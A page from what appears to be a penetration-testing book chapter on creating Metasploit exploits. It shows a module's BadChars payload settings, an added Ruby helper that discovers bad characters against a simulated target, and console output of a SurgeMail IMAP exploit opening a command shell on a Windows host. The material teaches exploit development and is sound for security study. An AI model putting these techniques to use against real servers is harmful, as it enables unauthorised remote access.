
Creating Your Own Exploits

211

mangled and marking that character as bad. One of the fastest methods, however, is to find the bad characters in the source code of similar exploits. For example, a search of the IMAP exploits as of this writing finds \x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b listed as bad characters, as shown next:

      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 10351,
          'DisableNops' => true,
          'BadChars'    => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b"
        },
      'Platform'       => 'win',
      'Targets'        =>

When you declare 'BadChars' in an exploit module, Metasploit will automatically exclude them from shellcode and from any automatically generated strings of text or NOPs.
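The send/compare/mark loop described above, and the check that a buffer honours a 'BadChars' declaration, as an added Ruby example (not code from the book or from the Metasploit project). The target is a constructed stand-in that truncates at NUL and drops the other listed characters; DEMO_TARGET, discover_bad_chars and bad_char_hits are names chosen for this example.

```ruby
# Added example (not from the book or the Metasploit project). Two helpers for
# bad-character work: one automates the send/compare/mark loop described in the
# text against a simulated target, the other checks a buffer against a BadChars
# declaration like the one in the IMAP module excerpt.

# The BadChars string from the module excerpt, as raw bytes.
BAD_CHARS = "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b".b

# Constructed stand-in for the vulnerable parser: a NUL truncates the copy
# (C string semantics) and the other listed characters are silently dropped.
DEMO_TARGET = lambda do |buf|
  copied = buf.b.split("\x00".b, 2).first.to_s
  copied.delete(BAD_CHARS[1..-1])
end

# Iteratively discover bad characters: send 0x01..0xff minus the bytes already
# marked bad, compare with what the target kept, mark the first byte that was
# mangled or shifted, and resend until the buffer survives intact.
def discover_bad_chars(target)
  bad = [0x00] # NUL is assumed bad up front, as in the usual test sequence
  loop do
    sent = (1..255).reject { |b| bad.include?(b) }.pack('C*')
    got  = target.call(sent).b
    hit  = sent.each_byte.with_index.find { |b, i| got.getbyte(i) != b }
    return bad.sort if hit.nil?
    bad << hit[0]
  end
end

# Check a candidate payload against a BadChars declaration. Returns
# [[offset, byte], ...] for every byte that would need to be encoded away.
def bad_char_hits(payload, bad_chars = BAD_CHARS)
  set = bad_chars.b.bytes
  payload.b.each_byte.with_index.select { |b, _| set.include?(b) }.map { |b, i| [i, b] }
end

if __FILE__ == $PROGRAM_NAME
  found = discover_bad_chars(DEMO_TARGET)
  puts 'Bad chars: ' + found.map { |b| format('\x%02x', b) }.join
  puts bad_char_hits("\x90\x90\x00A B".b).inspect
end
```

Against the simulated target the loop recovers exactly the eleven bytes from the module's 'BadChars' string, one per round.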

When we run the exploit again, as shown next, after declaring bad characters, we finally get a session on the third try. The exploit still isn't reliable, but it works because Metasploit dynamically changes the shellcode each time the exploit is run. As a result, the characters that are causing the module to fail may not always be present.

msf exploit(surgemail_book) > rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) > rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) > rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Command shell session 1 opened (192.168.1.101:59501 -> 192.168.1.155:4444)

(C) Copyright 1985-2001 Microsoft Corp.

c:\surgemail>